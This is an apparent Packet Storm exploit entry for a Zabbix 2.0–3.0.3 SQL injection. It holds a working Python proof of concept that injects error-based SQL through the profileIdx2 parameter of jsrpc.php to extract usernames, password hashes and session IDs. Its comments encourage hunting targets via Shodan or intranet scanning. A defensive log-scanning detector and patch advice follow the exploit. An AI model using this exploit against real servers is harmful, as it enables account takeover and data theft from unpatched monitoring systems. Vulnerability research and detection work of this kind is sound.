Zabbix 3.0.3 SQL Injection

Date: 08 Sep 2016 00:00:00. Reported by Zzzians. Type: packetstorm. Source: packetstormsecurity.com

Zabbix 3.0.3 SQL Injection Python Po

Code
```python
# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC
# Date: 20-08-2016
# Software Link: www.zabbix.com
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)
# Version: Zabbix 2.0-3.0.x(<3.0.4)

# PoC Author: Zzzians
# Contact: [email protected]
# Test on: Linux (Debian/CentOS/Ubuntu)

# -*- coding: utf_8 -*-
# Use Shodan or and enjoy :)
# Comb the intranet for zabbix and enjoy :)
import sys,os,re,urllib2
def Inject(url,sql,reg):
    payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(
        sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        response = urllib2.urlopen(payload, timeout=20).read()
    except Exception, msg:
        print '\t\tOpps,an error occurs...',msg
    else:
        result_reg = re.compile(reg)
        results = result_reg.findall(response)
        print payload #Uncomment this to see details
        if results:
            return results[0]
def exploit(url,userid):
    passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
    password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")
    if(password):
        print '[+]Username~Password : %s' % password
    else:
        print '[-]Get Password Failed'
    session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")
    if(session_id):
        print "[+]Session_id: %s" % session_id
    else:
        print "[-]Get Session id Failed"
    print '\n'

def main():
    print '=' * 70
    print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'
    print '\t\t Author:Zzzians([email protected])'
    print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'
    print '\t\t\t Time: 2016-08-20\n'
    urls = ["http://10.15.5.86"]
    ids = [1,2]
    for url in urls:
        if url[-1] != '/': url += '/'
        print '='*25 + url + '='*25
        for userid in ids:
            exploit(url,userid)
main()
```
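Detection side of the request shape above, as an added example that is not part of the original PoC: the injected SQL travels in the `profileIdx2` query parameter of `jsrpc.php`, so web access logs can be scanned for values of that parameter that are not plain numbers. The function names, the Apache/nginx combined log format and the rule that a legitimate `profileIdx2` is empty or a numeric ID are assumptions of this sketch; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed combined/common log format: ip ... "METHOD target HTTP/x.y" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def suspicious_profileidx2(line):
    """Return (client_ip, status, decoded_value) when the line is a jsrpc.php
    request whose profileIdx2 is not a plain number, otherwise None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("/jsrpc.php"):
        return None
    # parse_qs percent-decodes values; keep blanks so "profileIdx2=" is seen.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("profileIdx2", []):
        # Assumption: legitimate values are empty or a numeric ID.
        if not re.fullmatch(r"\d*", value):
            return m.group("ip"), int(m.group("status")), value
    return None


def scan(lines):
    """Collect every suspicious hit from an iterable of access-log lines."""
    return [hit for hit in map(suspicious_profileidx2, lines) if hit]


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Aug/2016:05:06:32 +0000] "GET /zabbix/jsrpc.php?type=9&method=screen.get&profileIdx=web.item.graph&profileIdx2=23297&resourcetype=17 HTTP/1.1" 200 512',
    '198.51.100.7 - - [20/Aug/2016:05:07:01 +0000] "GET /jsrpc.php?type=9&method=screen.get&profileIdx=web.item.graph&profileIdx2=%28select%201%20from%20dual%29&resourcetype=17 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [20/Aug/2016:05:08:15 +0000] "GET /zabbix/dashboard.php HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, status, value in scan(SAMPLE_LOG):
        print(f"{ip} status={status} profileIdx2={value!r}")
```

Only query strings that reach the access log are covered, so the same parameter sent in a POST body needs request-body logging or a WAF rule instead. The header of the PoC gives 3.0.4 as the first version outside the affected range, so a hit against an older server warrants checking the `users` and `sessions` tables for exposure and rotating credentials.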
